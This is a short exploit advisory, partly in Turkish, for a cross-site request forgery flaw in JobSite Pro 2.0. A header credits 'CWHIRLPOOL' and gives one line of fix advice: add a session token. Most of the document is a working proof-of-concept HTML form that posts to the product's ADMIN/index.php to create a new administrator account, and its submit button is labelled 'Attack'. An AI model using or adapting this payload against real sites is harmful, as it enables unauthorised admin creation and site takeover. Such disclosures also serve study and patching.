< ------------------- header data start ------------------- >

#############################################################

# Application Name : JobSite Pro 2.0

# vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak Yeni Bir admin Eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli...

# author : CWHIRLPOOL ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form onsubmit=’return ValidateAddNewUser(this)’ action=http://www.site.com/[path]/ADMIN/index.php method=post ENCTYPE=multipart/form-data>
<input type=hidden name=category value=security>
<input type=hidden name=action value=nouveau>
<input type=hidden name=SpecialProcessAddForm>
<input type=text name=username size=20>
<input type=password name=password size=20>
<input type=text name=telephone size=20>
<input type=text name=email size=20>
<input class=adminButton type=submit value= Attack >
</form>
< -- bug code end of -- >